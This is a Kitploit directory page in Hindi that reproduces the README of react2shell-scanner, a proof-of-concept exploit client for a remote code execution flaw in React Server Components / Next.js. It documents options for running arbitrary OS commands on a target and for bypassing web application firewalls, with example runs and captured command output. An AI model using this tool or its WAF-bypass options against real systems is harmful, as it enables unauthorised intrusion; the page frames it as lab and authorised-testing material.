Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-scanner — RSC/Next.js रिमोट कोड एग्जीक्यूशन भेद्यताओं का सटीकता-आधारित पता लगाना (CVE-2025-55182, CVE-2025-66478) | Kitploit
उपकरण/GitHubGitHub/hidden-investigations/react2shell-scanner
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

RSC/Next.js रिमोट कोड एग्जीक्यूशन भेद्यताओं का सटीकता-आधारित पता लगाना (CVE-2025-55182, CVE-2025-66478)

रिपॉजिटरी देखेंवेबसाइट
537 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell स्कैनर – PoC के साथ

CVE-2025-55182 – React Server Components RCE PoC
Hidden Investigations React2Shell लैब के लिए शैक्षिक शोषण क्लाइंट।

यह रिपॉजिटरी React2Shell भेद्यता (CVE-2025-55182) के लिए एकल-होस्ट प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण उपकरण है, जो गलत तरीके से कॉन्फ़िगर किए गए React Server Components / Next.js अनुप्रयोगों को लक्षित करता है।

इसे केवल आधिकारिक Hidden Investigations React2Shell लैब या उन सिस्टमों के विरुद्ध उपयोग करने के लिए डिज़ाइन किया गया है जिनके आप स्वयं स्वामी/प्रशासक हैं।


⚠️ कानूनी और नैतिक अस्वीकरण

यह परियोजना कड़ाई से शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान के लिए प्रदान की गई है:

  • इस उपकरण का उपयोग केवल निम्नलिखित पर करें:
    • आधिकारिक Hidden Investigations React2Shell लैब, या
    • ऐसे सिस्टम जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है।
  • इसे यादृच्छिक वेबसाइटों, उत्पादन सिस्टमों, या ऐसे बुनियादी ढाँचे पर न लगाएँ जिन्हें आप नियंत्रित नहीं करते।
  • लेखक और Hidden Investigations किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं।

इस उपकरण का उपयोग करके, आप सभी लागू कानूनों और विनियमों का पालन करने के लिए सहमत होते हैं।


विशेषताएँ

  • 🔥 React2Shell शोषण क्लाइंट CVE-2025-55182 के लिए
  • 🎯 एकल-होस्ट केंद्रित (कोई सामूहिक स्कैनिंग नहीं)
  • 📡 कस्टम पथ और पथ सूचियों के लिए समर्थन
  • 🧪 सुरक्षित जाँच मोड (कोई OS कमांड नहीं, केवल डिटेक्शन जाँच)
  • 🪟 विंडोज-अनुकूल मोड (whoami डिफ़ॉल्ट)
  • 🛡️ WAF बायपास सहायक:
    • जंक मल्टीपार्ट फ़ील्ड (--waf-bypass, --waf-bypass-size)
    • Vercel लेआउट ट्वीक (--vercel-waf-bypass)
  • 🔐 TLS विकल्प (--insecure, कस्टम हेडर)
  • 🧾 JSON आउटपुट (-o/--output, --all-results)
  • 🧘 स्वच्छ शांत मोड आउटपुट (अन्य उपकरणों में पाइप करने के लिए उपयुक्त)

  • आवश्यकताएँ

    • Python: 3.8+ (Python 3.10+ पर परीक्षित)
    • निर्भरताएँ:
      • requests

    निर्भरताएँ इस प्रकार स्थापित करें:

    root@kitploit:~
    pip install -r requirements.txt
    

    स्थापना

    1. Hidden Investigations रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/hidden-investigations/react2shell-poc.git
    cd react2shell-poc
    
    1. (वैकल्पिक लेकिन अनुशंसित) वर्चुअलएनवी बनाएँ:
    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate   # विंडोज पर: venv\Scripts\activate
    
    1. आवश्यकताएँ स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    
    1. उपकरण चलाएँ:
    root@kitploit:~
    python3 react2shell-scanner.py -h
    

    उपयोग

    मूल सहायता:

    root@kitploit:~
    python3 react2shell-scanner.py -h
    

    इस उपकरण को लक्ष्य URL की आवश्यकता है:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
    # या
    python3 react2shell-scanner.py --url http://localhost:3000 -c "id"
    

    यदि आप इसे -t/--target या -u/--url के बिना चलाते हैं, तो यह एक ब्रांडेड सहायता संदेश प्रिंट करता है और बाहर निकल जाता है।


    कमांड लाइन विकल्प

    लक्ष्य और पथ

    विकल्पविवरणडिफ़ॉल्ट
    -t, --targetलक्ष्य URL या डोमेन (आवश्यक जब तक --url उपयोग न हो)कोई नहीं
    -u, --url--target का उपनाम (Assetnote-शैली का फ़्लैग)कोई नहीं
    --pathपरीक्षण करने के लिए पथ (एकाधिक बार उपयोग किया जा सकता है, जैसे /, /_next)/
    --path-fileपरीक्षण करने के लिए पथों वाली फ़ाइल (प्रति पंक्ति एक)कोई नहीं

    ध्यान दें: यह PoC केवल एकल-होस्ट है। -l/--list विकल्प मौजूद है लेकिन जानबूझकर अक्षम किया गया है।


    शोषण / पेलोड व्यवहार

    विकल्पविवरणडिफ़ॉल्ट
    -c, --commandलक्ष्य पर निष्पादित करने का कमांड (जब शोषण सफल हो)id
    --safe-checkSAFE_CHECK पेलोड का उपयोग करें (कोई OS कमांड नहीं, केवल एक मार्कर स्ट्रिंग)बंद
    --windowsविंडोज लक्ष्यों के लिए डिफ़ॉल्ट समायोजित करें (जैसे id होने पर whoami का उपयोग करें)बंद
    --waf-bypassWAF से बचने के लिए अनुरोध बॉडी में एक बड़ा जंक मल्टीपार्ट फ़ील्ड जोड़ेंबंद
    --waf-bypass-size KB--waf-bypass के साथ उपयोग करने पर जंक फ़ील्ड का आकार KB में128
    --vercel-waf-bypassVercel WAF व्यवहार को ट्वीक करने के लिए वैकल्पिक मल्टीपार्ट लेआउट (सरलीकृत PoC)बंद

    HTTP / TLS विकल्प

    विकल्पविवरणडिफ़ॉल्ट
    --timeout SECONDSअनुरोध टाइमआउट सेकंड में15 (या 20 यदि --waf-bypass और कोई टाइमआउट सेट नहीं)
    -k, --insecureSSL सत्यापन अक्षम करें (curl -k जैसा)बंद
    -H, --headerकस्टम हेडर, जैसे -H "X-Forwarded-For: 127.0.0.1" (दोहराने योग्य)कोई नहीं

    आउटपुट / UX विकल्प

    विकल्पविवरणडिफ़ॉल्ट
    -o, --output FILEJSON परिणाम FILE में लिखेंकोई नहीं
    --all-results--output के साथ उपयोग करने पर गैर-भेद्य परिणाम भी शामिल करेंबंद
    -v, --verboseवर्बोज़ मोड – HTTP स्थिति और X-Action-Redirect हेडर दिखाएँबंद
    -q, --quietशांत मोड – सफलता पर केवल सामान्यीकृत कमांड आउटपुट प्रिंट करेंबंद
    --no-colorरंगीन टर्मिनल आउटपुट अक्षम करेंबंद

    शांत मोड उदाहरण (सुंदर, बहु-पंक्ति आउटपुट):

    root@kitploit:~
    python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"
    

    आउटपुट:

    root@kitploit:~
    total 12
    drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
    drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
    drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
    drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
    -rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
    drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
    -rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js
    

    बल्क स्कैनिंग फ़्लैग (जानबूझकर अक्षम)

    निम्नलिखित फ़्लैग Assetnote के CLI को मिरर करने के लिए मौजूद हैं, लेकिन इस PoC में लागू नहीं हैं ताकि सामूहिक स्कैनिंग के दुरुपयोग से बचा जा सके:

    विकल्पस्थिति
    -l, --listलागू नहीं
    --threads Nलागू नहीं

    यदि आप -l/--list का उपयोग करते हैं, तो उपकरण चेतावनी प्रिंट करेगा और बाहर निकल जाएगा, और बड़े पैमाने पर सुरक्षित स्कैनिंग के लिए Assetnote के मूल react2shell-scanner का उपयोग करने का सुझाव देगा।


    उदाहरण

    स्थानीय लैब पर चलाएँ:

    root@kitploit:~
    python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"
    

    बड़े जंक फ़ील्ड के साथ WAF बायपास का उपयोग करें:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"
    

    एक ही होस्ट पर कई पथ:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"
    

    फ़ाइल से पथ:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"
    

    सुरक्षित जाँच मोड (कोई OS कमांड निष्पादित नहीं):

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000 --safe-check
    

    परिणामों का JSON आउटपुट फ़ाइल में:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results
    

    JSON आउटपुट प्रारूप

    जब -o/--output का उपयोग किया जाता है, तो उपकरण इस प्रकार की वस्तुओं की एक सरणी लिखता है:

    root@kitploit:~
    [
      {
        "url": "http://localhost:3000/",
        "path": "/",
        "success": true,
        "status": "success",
        "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
        "http": {
          "status_code": 302,
          "headers": {
            "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
            "...": "..."
          }
        }
      }
    ]
    

    श्रेय और आभार

    • Hidden Investigations – React2Shell शैक्षिक लैब और PoC क्लाइंट प्रकाशित करने के लिए।
    • @sakibulalikhan – उपकरण लेखक।
    • Assetnote – उनके react2shell-scanner के माध्यम से WAF बायपास विचारों के लिए प्रेरणा।

    लाइसेंस

    यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE देखें।

    📬 हमसे संपर्क करें: [email protected]

    टूल डाउनलोड करें